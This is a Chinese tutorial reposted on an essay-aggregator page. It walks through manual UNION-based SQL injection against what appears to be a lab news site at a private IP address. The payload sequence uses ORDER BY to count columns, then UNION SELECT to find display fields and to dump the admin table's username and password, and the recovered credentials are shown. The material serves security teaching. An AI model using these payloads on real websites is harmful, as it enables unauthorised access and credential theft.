手机版
网站地图
美文美图
最新动态
你好,欢迎访问
好美文阅读网
个性皮肤
搜索
网站首页
美文
文章
散文
日记
诗歌
小说
故事
句子
作文
签名
祝福语
情书
范文
读后感
文学百科
美文摘抄
节日文章
名家散文
网名大全
座右铭
口号大全
面试技巧
说说大全
阅读答案
诗词默写
流言蜚语
节日祝福
好句子
经典台词
谚语大全
亲情故事
友情故事
表白情书
工作报告
活动总结
心得体会
专题汇总
美文网首页
SQL注入原理-手工联合查询注入技术
SQL注入原理-手工联合查询注入技术
作者:
糖no1
| 来源:发表于
2018-11-14 10:52 被阅读0次
【实验原理】首先,在链接后面添加语句
【order by 11(数字任意)】,
根据页面返回结果,来判断站点中的字段数目。然后,在链接后面添加语句
【union select 1,2,3,4,5,6,7,8,9,10,11 from admin(表名)】,
进行联合查询,来暴露可查询的字段编号。
最后,根据上一步得到的字段编号,添加语句
【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】,
直接暴露管理员用户名和密码。
就以新闻雷池作为例子
随便点击一个链接【http://192.168.1.3:8008/onews.asp?id=45】,在后面添加语句【order by 11】,页面显示正常。
同样添加语句【order by 12】页面报错,所以此站字段长度为11
在连接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin】,页面显示数字2和3
在连接后面添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】,即可暴出管理员用户名和密码。
管理员用户名【admin】和密码【bfpms】
相关文章
网友评论
本文标题:
SQL注入原理-手工联合查询注入技术
本文链接:
https://www.haomeiwen.com/subject/lkpdfqtx.html
延伸阅读
那年盛夏诗歌
环境监察队工作总结范文
优秀教师学习心得范文
华胥引的读后感300字
《Its red》教学反思范文
农资购销的合同范本
竞选中队委优秀演讲稿
辞金蹈海的成语解释
《世纪宝鼎》公开课教案设计
因为爱你,所以牵挂
今生今世红尘醉——美到
一个90后的内心独白
致已逝去的高中年华
深度阅读
您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!
情人节
母亲节
重阳节
清明节
端午节
植树节
元宵节
妇女节
愚人节
圣诞节
父亲节
教师节
儿童节
劳动节
青年节
建军节
万圣节
平安夜
光棍节
中秋节
国庆节
感恩节
腊八节
更多话题
栏目导航
摄影
故事
互联网
读书
旅行
热点阅读
《同级生》,我开始怀疑我的三观是否正确
月季花开(10)男婚女嫁
那些优秀的人有些不合群
ToB步入生态之争,阿里甲骨文等中外巨头的野望
【课堂随笔】“诺曼底”号遇难记
最全的word快捷键大全,拿走,不谢!处理文件再也不怕了
爱你,是我做过最好的事
"和时间做朋友"线下课体会
月季花开(9)洪泽湖畔结良缘
关于狗狗
网友评论